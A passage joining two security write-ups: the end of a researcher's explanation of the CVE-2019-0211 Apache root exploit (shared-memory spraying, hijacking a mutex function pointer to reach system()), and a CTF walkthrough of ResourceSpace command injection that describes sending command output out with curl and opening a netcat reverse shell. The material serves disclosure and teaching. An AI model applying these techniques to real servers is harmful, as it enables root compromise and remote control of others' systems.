}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr‘s .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr‘s .text.

Since we have knowledge of those region’s addresses through /proc/self/maps, we can go through every pointer in Apache’s memory and find one that matches the structure. It will be all_buckets[0].

As I mentioned, all_buckets‘s address changes at every graceful restart. This means that when our exploit triggers, all_buckets‘s address will be different than the one we found. This has to be taken into account; we’ll talk about this later.

2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)
Call:reach

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]

zend_object_std_dtor(object) ht = object->properties zend_array_destroy(ht) zend_hash_destroy(ht) val = &ht->arData[0]->val ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string.

Call:exec

As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

Right now, if all_buckets‘ address was unchanged in between restarts, our exploit would be over:

  • Get R/W over all memory after PHP’s heap
  • Find all_buckets by matching its structure
  • Put our structure in the SHM
  • Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload

As all_buckets‘ address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure — one for each PID.

Spraying the shared memory

If all_buckets‘ new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 =) 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won’t help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_bucketis relocated not too far from its original address, my_bucket will be in the sprayed area.

Call:exec

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of apache workers. Upon respawn, only one worker have a valid bucket number, but this is not a problem because the others will crash, and immediately respawn.

Success rate

Different Apache servers have different number of workers. Having more workers mean we can spray the address of our mutex over less memory, but it also means we can specify more index for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server of 4 workers (default), I had ~80% success rate. The success rate jumps to ~100% with more workers.

Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache’s error.logwill nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that’s the easy step.

Vulnerability timeline

  • 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
  • 2019-02-25 Acknowledgment of the vulnerability, working on a fix
  • 2019-03-07 Apache’s security team sends a patch for I to review, CVE assigned
  • 2019-03-10 I approve the patch
  • 2019-04-01 Apache HTTP version 2.4.39 released

Apache’s team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF.

Questions

Why the name ?

CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day

I had to.

Can the exploit be improved ?

Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well.

Does this vulnerability target PHP ?

No. It targets the Apache HTTP server.

Exploit

The exploit is available here.

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of the ResourceSpace was the version 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commits logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit, reveals the vulnerable entry point in the “/plugins/pdf_split/pages/pdf_split.php” page being passed to the run_command() function:

Gif diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus completes the comnand line, allowing us to execute arbitrary commands on the web server. However, as we don’t have a direct visible output, we need to use an HTTP server such as the Burp collaborator listening for incomming requests.

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag